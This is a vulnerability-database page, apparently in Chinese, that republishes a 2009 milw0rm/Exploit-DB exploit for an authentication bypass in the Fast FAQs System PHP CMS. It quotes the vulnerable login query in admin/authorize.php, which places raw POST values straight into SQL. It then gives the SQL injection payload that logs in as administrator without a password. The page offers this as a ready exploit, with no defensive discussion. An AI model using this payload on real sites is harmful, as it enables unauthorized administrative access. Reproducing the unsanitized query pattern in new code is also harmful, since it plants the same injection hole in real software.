Fast FAQs System - Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057246 漏洞类型
发布时间 2009-01-09 更新时间 2009-01-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7711
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
########################
# -=Fast FAQs System=- #
########################
Autore: x0r
Email: x0r@live.it
Cms Site: http://fastcreators.com/products/fast_faq/download.php
#########################

Bug In \admin\authorize.php

$query = "select * from admin where userid='{$_POST['uname']}' AND
pass='{$_POST['pass']}'";

Exploit:

' or '1=1

#######################

Greetz: Anna...Strabica...Emetta... Vi Amo..

-- w00t Zone - w00tzone.org 

# milw0rm.com [2009-01-09]